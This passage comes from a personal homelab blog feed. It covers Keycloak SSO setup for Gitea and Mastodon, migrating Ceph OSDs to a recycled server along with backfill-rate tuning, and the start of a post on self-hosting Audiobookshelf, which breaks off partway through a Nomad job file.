Keycloak client config, we also have to add &ldquo;offline_access&rdquo; as default.</p>
<p>And that&rsquo;s it already. There is a bit more in the guide, if you would also like
to administer Grafana groups with Keycloak, but I did not try that, as there&rsquo;s
currently only one user - me. &#x1f604;</p>
<h3 id="gitea">Gitea</h3>
<p>Gitea, like Grafana, allows adopting an existing user. Interestingly, it is
not able to configure OIDC SSO in the config file, but only via the admin
web interface.</p>
<figure>
    <img loading="lazy" src="gitea-config.png"
         alt="A screenshot of the Gitea admin config page for auth methods. Everything is in German. The auth type is set to &#39;OAuth2&#39;. The Authname is &#39;my-keycloak&#39;. OAuth2 Provider is set to &#39;OpenID Connect&#39; and the &#39;OpenId Connect Auto discovery URL&#39; is set to &#39;https://login.example.com/realms/homelab/.well-known/openid-configuration&#39;"/> <figcaption>
            <p>The Gitea config page for authentication methods.</p>
        </figcaption>
</figure>

<h3 id="mastodon">Mastodon</h3>
<p>And last but not least, Mastodon also supports OIDC, and also happily adopts
existing users. Sadly, I wasn&rsquo;t able to find any good guide on how to config
Mastodon, so I went with a couple of examples I saw in GitHub issues like
<a href="https://github.com/mastodon/mastodon/issues/7958">this one</a>.</p>
<p>Mastodon uses <a href="https://github.com/omniauth/omniauth">this third-party library</a>
to provide OIDC support.</p>
<p>For the Keycloak client setup, nothing special is needed. All URLs can just be
set to the root URL of your Mastodon instance, e.g. <code>https://social.example.com/</code>.</p>
<p>The Mastodon config itself is done via environment variables. One note here:
If you are running Mastodon in containers, the environment variables only need
to be defined for your &ldquo;web&rdquo; container.</p>
<p>I set the following variables in my config:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>OIDC_CLIENT_ID<span style="color:#f92672">=</span>my-mastodon-keycloak-client
</span></span><span style="display:flex;"><span>OIDC_CLIENT_SECRET<span style="color:#f92672">=</span><span style="color:#ae81ff">12345</span>
</span></span><span style="display:flex;"><span>OIDC_ENABLED <span style="color:#f92672">=</span> true
</span></span><span style="display:flex;"><span>OMNIAUTH_ONLY <span style="color:#f92672">=</span> true
</span></span><span style="display:flex;"><span>OIDC_DISPLAY_NAME <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;Login with Keycloak&#34;</span>
</span></span><span style="display:flex;"><span>OIDC_ISSUER <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https://login.example.com/realms/blog&#34;</span>
</span></span><span style="display:flex;"><span>OIDC_DISCOVERY <span style="color:#f92672">=</span> true
</span></span><span style="display:flex;"><span>OIDC_SCOPE <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;openid,profile,email&#34;</span>
</span></span><span style="display:flex;"><span>OIDC_UID_FIELD <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;preferred_username&#34;</span>
</span></span><span style="display:flex;"><span>OIDC_REDIRECT_URI <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https://social.example.com/auth/auth/openid_connect/callback&#34;</span>
</span></span><span style="display:flex;"><span>OIDC_SECURITY_ASSUME_EMAIL_IS_VERIFIED <span style="color:#f92672">=</span> true
</span></span><span style="display:flex;"><span>OIDC_END_SESSION_ENDPOINT <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https://login.example.com/realms/blog/protocol/openid-connect/logout&#34;</span>
</span></span></code></pre></div><p>Most of these options should be self-explanatory. The <code>OIDC_ISSUER</code> is the URL
to the realm in Keycloak. When <code>OIDC_DISCOVERY</code> is set to <code>true</code>, Mastodon will
automatically use the <code>.well-known</code> URL to get all the necessary info.</p>
<p>The <code>OIDC_UID_FIELD</code> allows you to chose where the username is coming from
in the JWT token send by Keycloak.</p>
<p>The <code>OMNIAUTH_ONLY</code> setting allows you to define that logins are only possible
via OIDC and nothing else. This disables local logins completely.</p>
<h2 id="final-words-and-alternatives">Final words and alternatives</h2>
<p>All in all, the configuration went pretty well, if we ignore Nextcloud for a
bit.</p>
<p>One problem with introducing SSO is that support is by far not universal. For
example, for Open Core apps, SSO is generally seen as an Enterprise-only option,
put behind the big 100k per year per user subscription. In other cases,
supporting SSO is just not a high priority.
For these cases, there is the possibility to use something like <a href="https://doc.traefik.io/traefik/middlewares/http/forwardauth/">Traefik forward auth</a>. <a href="https://geek-cookbook.funkypenguin.co.nz/docker-swarm/traefik-forward-auth/keycloak/">Funky Penguin</a> has a nice write-up, but I haven&rsquo;t gotten around to
trying it yet.</p>
<p>One big downside I encountered with Keycloak: You cannot set fine-grained
permissions per client. What I mostly wanted was: Only allowing certain users to
auth to certain clients. This functionality is completely missing. Once a user
is a member of a realm, they can access any client, unless the client itself
does some checking. Which few of them do.
This has been a problem recently, even. I wanted to offer access to some of my
self-hosted apps to friends, Nextcloud among them. But Nextcloud runs on my
own realm. So I would have to provide them access to all apps using SSO.
It&rsquo;s not too bad in this case, as these were close friends and I trust them,
but in a more general use case, this seems like a pretty oversight.</p>
<p>Finally, I also wanted to talk about why I decided against using Vault as my OIDC
provider, considering that I already have it set up.
The problem: I&rsquo;m using it for all of my Homelab related secrets. Everything that
needs to be used in an automated way comes from Vault, most importantly the
secrets for all of my Nomad jobs. And after some consideration, I decided that
I didn&rsquo;t want to mix the two things, namely user auth and Homelab secrets. Two
reasons for that: First, I might conceivably have additional users someday. That
would make security one level more difficult, by having admin level access to
the lab and services access to services run in that lab mixed up.
Second, I want to secure public facing services - so my IdP also needs to be
accessible publicly. And I really don&rsquo;t want my secrets store to hang on the
open internet.</p>
<p>Sure, I could do things like allowing my external proxy to only forward certain
URLs to the Vault cluster. But honestly: I prefer there to be exactly zero paths
from the public Internet to the listening sockets of my secrets store.</p>
<p>One big advantage Vault has over Keycloak though: It supports fine-grained
permissions per user per client, so users can&rsquo;t connect to a client just because
they are members of the same realm as said client.</p>
<p>You might also have realized that in the Apps section, I did not mention a
single infrastructure app, e.g. Vault, Consul or Nomad. This was on purpose,
as I did not want to have my public Identity Provider to be able to grant access
to admin level apps. But I am considering setting up Vault OIDC specifically
for apps like Consul, Vault and Nomad. I will just first have to make really
sure that I&rsquo;ve got an escape hatch ready. &#x1f605;</p>
]]></content:encoded>
    </item>
    <item>
      <title>Migrating two Ceph OSDs from one physical hosts to another</title>
      <link>https://blog.mei-home.net/posts/ceph-migration-old-homeserver/</link>
      <pubDate>Sun, 23 Apr 2023 21:47:40 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/ceph-migration-old-homeserver/</guid>
      <description>Description of the procedure and discussion of the performance.</description>
      <content:encoded><![CDATA[<p>Over the weekend, I migrated one of the Ceph VMs in my Homelab over to a
physical host. This time around, instead of buying a completely new machine,
I recycled most of my old 2018 era home server. It&rsquo;s an old AMD A10-9700E,
meaning the 35W TDP variant.</p>
<p>I have noted some thoughts on reusing this old machine <a href="https://blog.mei-home.net/posts/reuse-old-homelab/">here</a>.</p>
<p>Mounted in the rack, the machine looks like this:</p>
<figure>
    <img loading="lazy" src="server-in-rack.jpg"
         alt="A picture of a 19 inch rack mounted server. It shows a 3U case, with a full size ATX PSU and mATX mainboard. Quite recognizable are beige-and-brown colored case and CPU fans"/> <figcaption>
            <p>Server mounted in the rack, without Ceph OSD disks attached.</p>
        </figcaption>
</figure>

<p>The setup went as always. First generating an Ubuntu based image with Packer.
Again pretty funny: The Qemu provisioner for Packer takes a bock-standard
install medium. Those install mediums generally require at least some input
from the user. And Packer just provides a list of strings for the commands it
will then send to the VM&rsquo;s <code>stdin</code> to be entered into any prompts. You can also
sprinkle some <code>wait</code> into the list of commands to make sure the right input
field is present before Packer starts &ldquo;typing&rdquo;. :beaming_face_with_smiling_eyes:</p>
<p>That went extremely smoothly this time around. I believe this was the first time
since starting to use Packer and Ansible for deployments where I did not have to
fiddle with the bootstrapping playbook while creating and deploying the new
host. :grinning_face:</p>
<p>Putting it all into the case also went pretty well. This time, I bought the right
length of rails and also configured them right from the beginning. No sticking
out of the rack for this server.
As always when it comes to rails and my Homelab, there was a problem though: I
had done a test fitting before putting in the components, to make sure I got the
rails right. And afterwards, I wasn&rsquo;t able to get the case dismounted again.</p>
<p>I now know two things: I really don&rsquo;t like mounting rails. And I can actually
build an entire machine while the case is already mounted. Although my back
insisted that I don&rsquo;t do that again anytime soon. :grinning_face_with_sweat:</p>
<h2 id="ceph-migration">Ceph migration</h2>
<p>If there&rsquo;s one thing which annoys me every time with Ceph, it is that there&rsquo;s
no good way to take disks out of one host, putting them into another, and then
getting the disks <em>and their content</em> reused by a fresh OSD.
So every time I switch hosts, I have to remove the OSDs from one host, wait for
re-balancing to finish, and put them in the other host and then wait for more or
less the same data as was on there before getting written to the disk again.</p>
<p>But when searching the web, pretty much everyone runs into problems when they
somehow try to work around this limitation. And if there&rsquo;s one thing I don&rsquo;t
want to look like it came right out of Frankenstein&rsquo;s lab, it&rsquo;s my storage
daemons.</p>
<p>So OSD removal it was. And that took over one day. Even though there was only
a single digit number of Terabytes to transfer. What would happen when an OSD
is removed from a Ceph cluster is a recovery operation. This operation takes all
the placement groups on the removed OSDs and migrates them to other OSDs. As I
only have six OSDs in my cluster (three large HDD, three smaller SSD) and a
replication factor of two, I would expect this to go relatively fast. But it
didn&rsquo;t.</p>
<p>And that is the problem I would like to dig into a bit. I started the OSD removal
of the old OSDs with a <code>ceph orch host drain</code> command on Friday, 13:45h. It was
done on Sunday morning, 00:50h.</p>
<figure>
    <img loading="lazy" src="removal-pg-graph.png"
         alt="A screenshot of a Grafana time series graph. The Y axis shows values from 0 to 190, while the X axis shows time from 21.04.2023 18:00h to 23.04.2023 00:00. The graph first falls rapidly from it&#39;s starting point at about 170 on the y axis, until about 18:00 on the 21st. Then it falls slower, with a marked flat line between approximately 23:00h on the 21st and 10:00h on the 22nd. It reaches 0 around 01:00 on the 23rd."/> <figcaption>
            <p>The number of Placement groups in the &lsquo;remapped&rsquo; state over time.</p>
        </figcaption>
</figure>

<p>The initial rapid remapping of PGs is when the SSD OSD got cleared. After that,
with the HDD OSD, the remapping rate fell precipitously.</p>
<figure>
    <img loading="lazy" src="disk-io-removal.png"
         alt="Screenshot of a Grafana time series graph. The graph is titled &#39;Disk IO Utilization&#39;. It shows a percentage from 0% to 100% on the Y axis and time from 14:35h on 21.04.2023 to 01:00h on 23.04.2023 on the X axis. The plot labeled &#39;sdb&#39; goes from 70% in the beginning, to 45% at around an hour later all the way down to merely 2.70% starting at 23:00h on the 21st and remains there until the end. The plot labeled &#39;sdc&#39; goes to 100% in the beginning and falls to 18% around 15:18h on the 21st and then stays at that level until the end."/> <figcaption>
            <p>Disk IO utilization on one of the Ceph hosts which received the PGs from the draining host</p>
        </figcaption>
</figure>

<p>The picture above is representative of the situation on all three hosts involved
in the re-balancing. In the beginning, all disks run near 100%, capped by my 1 Gbps
network. But after a while, the performance fell further and further down, until
I saw only a max of 10 MB/s on Saturday morning. The other resources look similar.
Network was not bottlenecked, CPU was pretty low (and no core was pegged at 100%),
and disk IO was minimal on all three hosts.</p>
<h2 id="swapping-disks">Swapping disks</h2>
<p>This morning, after the migration was finally done, I switched the disks from
the old server to the new one. One problem I had foreseen was how to determine
which disks to pull. The server has six, and I only wanted two of them.</p>
<p>I finally found the solution in looking at <code>/dev</code>, specifically the
<code>/dev/disk/by-path</code> directory. The result looks something like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>lrwxrwxrwx <span style="color:#ae81ff">1</span> root root  <span style="color:#ae81ff">9</span> Apr <span style="color:#ae81ff">23</span> 10:37 pci-0000:00:17.0-ata-2 -&gt; ../../sda
</span></span><span style="display:flex;"><span>lrwxrwxrwx <span style="color:#ae81ff">1</span> root root  <span style="color:#ae81ff">9</span> Apr <span style="color:#ae81ff">23</span> 10:37 pci-0000:00:17.0-ata-2.0 -&gt; ../../sda
</span></span><span style="display:flex;"><span>lrwxrwxrwx <span style="color:#ae81ff">1</span> root root  <span style="color:#ae81ff">9</span> Apr <span style="color:#ae81ff">23</span> 10:37 pci-0000:00:17.0-ata-3 -&gt; ../../sdb
</span></span><span style="display:flex;"><span>lrwxrwxrwx <span style="color:#ae81ff">1</span> root root <span style="color:#ae81ff">10</span> Apr <span style="color:#ae81ff">23</span> 10:37 pci-0000:00:17.0-ata-3-part1 -&gt; ../../sdb1
</span></span><span style="display:flex;"><span>lrwxrwxrwx <span style="color:#ae81ff">1</span> root root <span style="color:#ae81ff">10</span> Apr <span style="color:#ae81ff">23</span> 10:37 pci-0000:00:17.0-ata-3-part2 -&gt; ../../sdb2
</span></span><span style="display:flex;"><span>lrwxrwxrwx <span style="color:#ae81ff">1</span> root root <span style="color:#ae81ff">10</span> Apr <span style="color:#ae81ff">23</span> 10:37 pci-0000:00:17.0-ata-3-part3 -&gt; ../../sdb3
</span></span><span style="display:flex;"><span>lrwxrwxrwx <span style="color:#ae81ff">1</span> root root  <span style="color:#ae81ff">9</span> Apr <span style="color:#ae81ff">23</span> 10:37 pci-0000:00:17.0-ata-3.0 -&gt; ../../sdb
</span></span><span style="display:flex;"><span>lrwxrwxrwx <span style="color:#ae81ff">1</span> root root <span style="color:#ae81ff">10</span> Apr <span style="color:#ae81ff">23</span> 10:37 pci-0000:00:17.0-ata-3.0-part1 -&gt; ../../sdb1
</span></span><span style="display:flex;"><span>lrwxrwxrwx <span style="color:#ae81ff">1</span> root root <span style="color:#ae81ff">10</span> Apr <span style="color:#ae81ff">23</span> 10:37 pci-0000:00:17.0-ata-3.0-part2 -&gt; ../../sdb2
</span></span><span style="display:flex;"><span>lrwxrwxrwx <span style="color:#ae81ff">1</span> root root <span style="color:#ae81ff">10</span> Apr <span style="color:#ae81ff">23</span> 10:37 pci-0000:00:17.0-ata-3.0-part3 -&gt; ../../sdb3
</span></span><span style="display:flex;"><span>lrwxrwxrwx <span style="color:#ae81ff">1</span> root root  <span style="color:#ae81ff">9</span> Apr <span style="color:#ae81ff">23</span> 10:37 pci-0000:00:17.0-ata-4 -&gt; ../../sdc
</span></span><span style="display:flex;"><span>lrwxrwxrwx <span style="color:#ae81ff">1</span> root root <span style="color:#ae81ff">10</span> Apr <span style="color:#ae81ff">23</span> 10:37 pci-0000:00:17.0-ata-4-part1 -&gt; ../../sdc1
</span></span><span style="display:flex;"><span>lrwxrwxrwx <span style="color:#ae81ff">1</span> root root <span style="color:#ae81ff">10</span> Apr <span style="color:#ae81ff">23</span> 10:37 pci-0000:00:17.0-ata-4-part2 -&gt; ../../sdc2
</span></span><span style="display:flex;"><span>lrwxrwxrwx <span style="color:#ae81ff">1</span> root root <span style="color:#ae81ff">10</span> Apr <span style="color:#ae81ff">23</span> 10:37 pci-0000:00:17.0-ata-4-part3 -&gt; ../../sdc3
</span></span><span style="display:flex;"><span>lrwxrwxrwx <span style="color:#ae81ff">1</span> root root  <span style="color:#ae81ff">9</span> Apr <span style="color:#ae81ff">23</span> 10:37 pci-0000:00:17.0-ata-4.0 -&gt; ../../sdc
</span></span><span style="display:flex;"><span>lrwxrwxrwx <span style="color:#ae81ff">1</span> root root <span style="color:#ae81ff">10</span> Apr <span style="color:#ae81ff">23</span> 10:37 pci-0000:00:17.0-ata-4.0-part1 -&gt; ../../sdc1
</span></span><span style="display:flex;"><span>lrwxrwxrwx <span style="color:#ae81ff">1</span> root root <span style="color:#ae81ff">10</span> Apr <span style="color:#ae81ff">23</span> 10:37 pci-0000:00:17.0-ata-4.0-part2 -&gt; ../../sdc2
</span></span><span style="display:flex;"><span>lrwxrwxrwx <span style="color:#ae81ff">1</span> root root <span style="color:#ae81ff">10</span> Apr <span style="color:#ae81ff">23</span> 10:37 pci-0000:00:17.0-ata-4.0-part3 -&gt; ../../sdc3
</span></span><span style="display:flex;"><span>lrwxrwxrwx <span style="color:#ae81ff">1</span> root root  <span style="color:#ae81ff">9</span> Apr <span style="color:#ae81ff">23</span> 10:37 pci-0000:00:17.0-ata-8 -&gt; ../../sdd
</span></span><span style="display:flex;"><span>lrwxrwxrwx <span style="color:#ae81ff">1</span> root root  <span style="color:#ae81ff">9</span> Apr <span style="color:#ae81ff">23</span> 10:37 pci-0000:00:17.0-ata-8.0 -&gt; ../../sdd
</span></span></code></pre></div><p>The number after the <code>-ata</code> is the SATA port on the mainboard to which the drive
is connected. Or at least it should be. In my case, I got lucky. The numbers
corresponded perfectly to the silk screen on the board, and I was able to
identify the disks I needed to pull this way.</p>
<p>Still, a tip: Just unplug the disk you think you want to pull and then boot the
machine, just to make sure. I had read the silk screen wrong, and pulled one of
the system disks.</p>
<p>After I had installed the drives, I started the same operation as before, just
in reverse: I added the new OSDs to the Ceph cluster with <code>ceph orch daemon add HOSTNAME:/dev/sdX</code>.</p>
<p>And again, I was greeted with anemic backfill rates of around 10MB/s after the
SSD was filled.</p>
<p>I checked the two config values I had used before, <code>osd_recovery_max_active</code> and
<code>osd_max_backfill</code>, but they were still set to <code>40</code>. And yet, I only saw a few
PGs being remapped at a time. It turns out that there&rsquo;s a new(ish) scheduler in
Ceph, <a href="https://docs.ceph.com/en/quincy/rados/configuration/osd-config-ref/#dmclock-qos">dmlock</a>.</p>
<p>With this new scheduler, <em>profiles</em> were introduced, which override the
aforementioned settings. And this scheduler has a <code>high_recovery_ops</code> profile.
Switching it on with <code>ceph config set osd osd_mlock_profile high_recovery_ops</code>
increased the throughput&hellip;to a still pretty bad 20 MB/s. Digging further, I
found the <code>osd_mclock_override_recovery_settings</code> option. Switching this one to
<code>true</code> then finally gave me the about 60 MB/s I would expect at a minimum, after
setting the <code>osd_max_backfill</code> and <code>osd_recovery_max_active</code> options I mentioned
above again. But even that didn&rsquo;t last too long. While writing these lines, the
recovery rate has fallen back to about 35 MB/s.</p>
<p>And I still don&rsquo;t know why Ceph doesn&rsquo;t use more of the available resources.
Sure, I can understand leaving some resources on standby, just in case more
client requests show up. But this much? In theory, I should be reaching about
120 MB/s, which is the max of both my 1 Gbps LAN and my HDDs.</p>
<p>Instead of writing this blog post, I really should have made it a mailing list
post on the Ceph mailing list. I&rsquo;m reasonably sure that I&rsquo;m doing something
fundamentally wrong here.</p>
<p>If any of you have a good hint, I would be very happy to hear it.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Audiobookshelf for Podcasts and Audiobooks</title>
      <link>https://blog.mei-home.net/posts/audiobookshelf/</link>
      <pubDate>Wed, 12 Apr 2023 23:49:01 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/audiobookshelf/</guid>
      <description>Setting up a self-hosted instance of Audiobookshelf</description>
      <content:encoded><![CDATA[<p>I was recently introduced to the excellent <a href="https://wolf359.fm/">Wolf 359</a> audio
drama. It&rsquo;s the story of the crew of a space station orbiting a distant star,
with good humor and interpersonal drama as well as some suspense/horror sprinkled
in.</p>
<p>I have a small set of other podcasts as well, first and foremost the great
<a href="https://www.thebritishhistorypodcast.com/">British History Podcast</a>. Up to this
point, I had mostly listened on my phone, during train rides, but also via my
browser during Saturday morning household chores.</p>
<p>My problem: I used <a href="https://podcastaddict.com/app">Podcast Addict</a> on my phone,
and the podcast&rsquo;s website on my PC. So there was no syncing of which episodes
I had already listened to, and no syncing of listen positions inside an episode.</p>
<p>So that was my main motivator to look into a selfhosted podcast app. In addition,
I have a couple of audiobooks from the pandemic lockdown times I listened to
while making and eating lunch, which I also wanted to put somewhere that wasn&rsquo;t
Audible.</p>
<h2 id="the-possible-solutions">The possible solutions</h2>
<p>There are a number of solutions for selfhosted podcast apps. I had the following
requirements in my mind:</p>
<ul>
<li>Needed to sync at least completed episodes</li>
<li>Needed a web player, because I&rsquo;m just used to doing many things in the browser
these days</li>
<li>Bonus: Sync listening position in a started episode</li>
</ul>
<p>On my &ldquo;services to look at&rdquo; list, I already had
<a href="https://github.com/akhilrex/podgrab">Podgrab</a>. But looking at the Github repo,
the last commit was from September 2022 - a bit too long ago for my taste. But
looking at the open issues, I saw <a href="https://github.com/akhilrex/podgrab/issues/272">this one</a>
advertising <a href="https://github.com/SamTV12345/PodFetch">an alternative</a>.</p>
<blockquote>
<p>It is written in Rust</p></blockquote>
<p>Well excellent. That universal moniker for quality software.
(I&rsquo;m sorry Rustaceans. I know you really like your language. And I promise I
will most likely come around to your language. Once the community has gotten
past its proselytizing phase.)</p>
<p>But Rust wasn&rsquo;t the main problem with it, of course. Instead it was the fact
that launching the container locally, it just didn&rsquo;t work. No player showed up.
That might have been due to the fact that it is using websockets, and the
protocol upgrade simply didn&rsquo;t work properly. But it turned me off. So did the
rather barebones Web UI. Granted, when you&rsquo;re looking at the Web UI for a
podcast player, you&rsquo;re doing it wrong. But it still turned me off.</p>
<p>Then, I read about <a href="https://gpodder.github.io/">GPodder</a>. It&rsquo;s a Linux desktop
podcast manager, but also a protocol for podcast progress sync.
I wasn&rsquo;t too hot on the &ldquo;Linux Desktop App&rdquo; idea, to be honest. And the docs for
the <a href="https://github.com/gpodder/mygpo">selfhosted variant</a> for <a href="https://gpodder.net/">the gpodder
online service</a> didn&rsquo;t look too confidence-inspiring.</p>
<p>Finally, I decided on <a href="https://www.audiobookshelf.org/">Audiobookshelf</a>. At
first look, it fulfilled all my requirements and actually worked when I ran it
locally.</p>
<h2 id="the-winner-audiobookshelf">The winner: Audiobookshelf</h2>
<p>Audiobookshelf started its life as a pure audiobook app and only added podcasts
a little while ago. But having a combo app suited me quite well, as I also have
some audiobooks on Audible I always wanted to get onto my own infrastructure.</p>
<p>It works on the principle of &ldquo;libraries&rdquo;, and is entirely file based where the
media itself is concerned. If you remove a file for a podcast episode or an
audiobook, it will also be removed from your Audiobookshelf library, as ABS
doesn&rsquo;t track library items on its own.</p>
<p>When you open it, you are greeted with a nice interface for both, podcasts
and audiobooks.</p>
<figure>
    <img loading="lazy" src="audiobookshelf_home.png"
         alt="A screenshot of the audiobookshelf web UI. On the left is a menu, showing the following entries: Home, Library, Series, Collections, Authors. In the header is a search bar on the left. On the right are three symbols, a stylized bar char, an upload button and a cogwheel. The main area has several sections, each showing the covers of audiobooks, with their titles and authors beneath them. The sections are: Recently Added, Recent Series and cut off at the bottom the Recommended section."/> 
</figure>

<p>As you can see, I tend towards history novels. &#x1f609;. I can recommend all of them.
Especially Rebecca Gable&rsquo;s Waringham Saga when you&rsquo;re into medieval England.</p>
<p>The podcasts page looks very similar:</p>
<figure>
    <img loading="lazy" src="audiobookshelf_podcasts.png"
         alt="Another screenshot of the Web UI. This time, the menu on the left of the screen contains these entries: Home, Latest, Library, Search, Queue. The sections in the main area are: Continue Listening, Newest Episodes, Recently Added."/> 
</figure>

<p>In the search tab, you can either search by keyword (which uses iTunes for the
search) or you can enter an RSS feed URL directly. When something is found,
ABS will show the available info on the Podcast.</p>
<figure>
    <img loading="lazy" src="audiobookshelf_search.png"
         alt="Another screenshot of the Web UI. The details available are the podcasts title and author, the feed URL, Genres, a drop-down for the Type, a field for Language and description, a checkbox to mark the content as explicit, the folder for the podcasts files. Finally, a checkbox to automatically download podcast episodes."/> 
</figure>

<p>Once a new podcast is added, its page will look pretty blank.</p>
<figure>
    <img loading="lazy" src="podcast_empty.png"
         alt="Another screenshot of the Web UI. The page shows the podcasts cover picture, title, genre etc at the top. At the bottom is a section headed Episodes, which helpfully shows No Episodes in the screenshot."/> 
</figure>

<p>As mentioned before, Audiobookshelf is entirely file based. And because we
haven&rsquo;t downloaded an episode yet, ABS shows that there are no episodes. Which
is my biggest complaint at the moment. Because everything is tied to files on
disk, I can only see episodes which I downloaded. I can of course fix this by
enabling automatic download of new episodes. But: This will mean that my disk
will grow pretty full pretty quickly with currently 28 podcasts. I would very
much prefer a setup like Podcast Addict, where it shows me all the available
episodes, and I can click to download a couple of them.</p>
<p>This behavior also has repercussions for finished episodes. Yes, I can then
delete them. But if I haven&rsquo;t downloaded a number of fresh episodes already,
I have no way of knowing where I was, as ABS does not store the finished state
after an episode file is deleted. So for now, I have to pay attention and
make sure I always download a fresh episode before I delete the last finished
episode.</p>
<p>In principle, this isn&rsquo;t too bad for audio dramas, where I might actually want
to keep them for repeat listening. But something like the weekly selfhosted
podcast, or Linux after Dark, I don&rsquo;t care too much about old episodes I have
already finished.</p>
<p>But let&rsquo;s continue the UI tour. To download new episodes, you click the
magnifying glass, where you will then be shown a list of the available episodes
from the RSS feed.</p>
<figure>
    <img loading="lazy" src="podcast_episode_search.png"
         alt="Another screenshot of the Web UI. It shows a list of available episodes, with their episode number, title, publishing date and first line of description. There is also a search bar at the top."/> 
</figure>

<p>If you actually have some episodes downloaded, they will be clearly marked in
the list.</p>
<figure>
    <img loading="lazy" src="podcast_list_downloaded.png"
         alt="The bottom of the same list as before, but now there is a green check mark next to the very first episode."/> 
</figure>

<p>As a pretty nice feature, you can re-export any podcast as an RSS feed, so that
you can point e.g. your phone&rsquo;s podcast app at it. This prevents listening position
and finished episodes sync, of course.</p>
<p>As a connaisseur of pretty plots, I also need to mention that there are a couple
of stats available on your listening habits.</p>
<figure>
    <img loading="lazy" src="stats.png"
         alt="The stats page shows a line chart with listening time, minutes on the Y axis and date on the X axis. Furthermore, completed items, days listening etc are also shown."/> 
</figure>

<p>In my defense of the 555 minutes on Wednesday: I took a sick day because I
had overextended something in my neck and could barely hold up my head for any
length of time. So I found a comfortable position on the couch, donned headphones
and started listening. &#x1f605;</p>
<p>I&rsquo;ve also used it during my commute today. It works nicely as a Progressive
Web App (PWA) added to my home screen, including player controls on the lock
screen.
The only thing missing is preloading episodes. The web player streams them
directly from the server. Probably not too good for my monthly data volume.
Here, re-exporting the RSS feed would work, but then I wouldn&rsquo;t have playback
and finished episodes sync. &#x1f937;</p>
<p>In summary, I&rsquo;m pretty satisfied with the app. Besides that tiny problem
that it is only based on files. But this is of course a legacy of its audiobook
roots, and there are several open issues on GitHub to address this.</p>
<h2 id="setup">Setup</h2>
<p>And now finally to the setup. As always, I have set ABS up as a Nomad job,
using a Ceph CSI RBD volume for storage, Consul connect service mesh for
connectivity and Traefik as my proxy.</p>
<p>As ABS does not have any external dependencies, the setup was pretty
straightforward. It also does not have many configuration options.</p>
<p>One very important thing to note: In all of the Docker examples, there are
specific directories mounted for the audiobook and podcast libraries. Don&rsquo;t
get fooled by this. I did. I spend a considerable amount of time thinking about
the fact that it has config options to define the metadata and config dirs, but
not the audiobook and podcast library dirs. And tried to wrap my head around
how to use a single Ceph CSI volume to supply two different top level directories
in the container.</p>
<p>Of course, in hindsight, that was pretty stupid. Because the reason ABS doesn&rsquo;t
have config options for the audiobook and podcast libraries is&hellip;that you
can freely choose the directory for your libraries when you create them. &#x1f926;</p>
<p>Here&rsquo;s my Nomad job file:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span><span style="color:#66d9ef">job</span> <span style="color:#e6db74">&#34;audiobookshelf&#34;</span> {
</span></span><span style="display:flex;"><span>  datacenters <span style="color:#f92672">=</span> [<span style="color:#e6db74">&#34;mine&#34;</span>]
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  priority <span style="color:#f92672">=</span> <span style="color:#ae81ff">50</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">constraint</span> {
</span></span><span style="display:flex;"><span>    attribute <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;${node.class}&#34;</span>
</span></span><span style="display:flex;"><span>    value     <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;internal&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">group</span> <span style="color:#e6db74">&#34;audiobookshelf&#34;</span> {
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">network</span> {
</span></span><span style="display:flex;"><span>      mode <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;bridge&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">port</span> <span style="color:#e6db74">&#34;health&#34;</span> {
</span></span><span style="display:flex;"><span>        host_network <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;local&#34;</span>
</span></span><span style="display:flex;"><span>        to           <span style="color:#f92672">=</span> <span style="color:#ae81ff">80</span>
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>    }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>    <span style="color:#66d9ef">service</span> {
</span></span><span style="display:flex;"><span>      name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;audiobookshelf&#34;</span>
</span></span><span style="display:flex;"><span>      port <span style="color:#f92672">=</span> <span style="color:#ae81ff">80</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      <span style="color:#66d9ef">connect</span> {
</span></span><span style="display:flex;"><span>        <span style="color:#66d9ef">sidecar_service</span> {}
</span></span><span style="display:flex;"><span>      }
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>      tags <span style="color:#f92672">=</span> [
</span></span><span style="display:flex;"><span>        &#34;traefik.enable<span style="color:#f92672">=</span><span style="color:#66d9ef">true</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>        &#34;traefik.consulcatalog.connect<span style="color:#f92672">=</span><span style="color:#66d9ef">true</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
</span></span><span style="display:flex;"><span>        &#34;traefik.http.routers.audiobookshelf.entrypoints<span style="color:#f92672">=</span><span style="color:#66d9ef">internal</span><span style="color:#960050;background-color:#1e0010">-</span><span style="color:#66d9ef">entry</span><span style="color:#960050;background-color:#1e0010">&#34;</span>,
